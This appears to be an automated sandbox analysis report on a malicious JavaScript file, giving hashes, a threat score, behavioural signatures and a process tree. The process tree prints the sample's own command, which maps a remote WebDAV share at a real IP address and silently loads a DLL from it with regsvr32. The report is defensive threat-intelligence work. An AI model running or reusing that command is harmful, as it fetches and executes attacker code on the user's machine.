Analysis
-
max time kernel
150s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
24/07/2024, 01:06
Static task
static1
Behavioral task
behavioral1
Sample
3229915988687420440.js
Resource
win7-20240708-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
3229915988687420440.js
Resource
win10v2004-20240709-en
5 signatures
150 seconds
General
-
Target
3229915988687420440.js
-
Size
6KB
-
MD5
c30a7e59d5451bd4b9861b9f87b78524
-
SHA1
8a519c837cd49d5a2b4a739ed103506800d0ae3e
-
SHA256
dff866ee7e8bf8095748a14b2a1ed52972939d0948d0a93a78ca65a415b7d716
-
SHA512
4e61751475bb5e88f9ef3e7c316d54836e9345d40fd44f85359a0261a228d33b71ca4840c0f26d0375402e3efabce2ac1d9f9fe83fa3b7cf4f18c8324f5c22bc
-
SSDEEP
96:ss+VNiQMHl6exC0EOvzbPfwAkJXzbPfwJQSD:s3NiQu1xwOvzbPfwAkhzbPfwJQSD
Score
7/10
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1564 wrote to memory of 2908 1564 wscript.exe 84 PID 1564 wrote to memory of 2908 1564 wscript.exe 84 PID 2908 wrote to memory of 872 2908 cmd.exe 86 PID 2908 wrote to memory of 872 2908 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\3229915988687420440.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\234913008813484.dll2⤵
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:872
-
-